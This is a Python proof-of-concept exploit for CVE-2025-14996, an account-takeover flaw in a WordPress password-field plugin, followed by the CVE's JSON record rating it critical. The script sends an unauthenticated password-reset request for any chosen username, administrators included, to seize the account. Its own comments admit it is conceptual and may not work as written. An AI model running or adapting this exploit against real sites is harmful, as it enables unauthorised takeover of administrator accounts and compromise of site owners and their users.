CVE-2025-14996

import requests import sys # CVE-2025-14996 PoC - AS Password Field In Default Registration Form Account Takeover # Target: WordPress site with vulnerable plugin installed def exploit_password_takeover(target_url, username, new_password): """ Exploit the privilege escalation vulnerability in AS Password Field plugin to change any user's password without authentication. Args: target_url: Base URL of the WordPress site username: Target username to takeover new_password: New password to set for the target user """ target_url = target_url.rstrip('/') # Step 1: Get the registration form to obtain necessary tokens registration_url = f"{target_url}/wp-login.php?action=register" # Step 2: Construct password reset/request with the vulnerable endpoint # The plugin processes password updates without proper validation exploit_url = f"{target_url}/wp-login.php" # Step 3: Send password update request # Note: This PoC demonstrates the concept; actual exploitation may vary # based on plugin version and WordPress configuration payload = { 'user_login': username, 'pass1': new_password, 'pass2': new_password, 'action': 'resetpass' } try: # Attempt to trigger password change response = requests.post(exploit_url, data=payload, timeout=30) if response.status_code == 200: print(f"[*] Request sent for user: {username}") print(f"[*] Check if password was changed successfully") return True except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve-2025-14996.py <target_url> <username> <new_password>") print("Example: python cve-2025-14996.py http://example.com admin MyNewPass123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] password = sys.argv[3] exploit_password_takeover(target, user, password)

{"cve": {"id": "CVE-2025-14996", "sourceIdentifier": "[email protected]", "published": "2026-01-06T05:15:59.810", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The AS Password Field In Default Registration Form plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 2.0.0. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/as-password-field-in-default-registration-form/tags/2.0.0/as-password-field-default-registration.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/061f022b-b922-4499-bb34-8ea91ba5ace3?source=cve", "source": "[email protected]"}]}}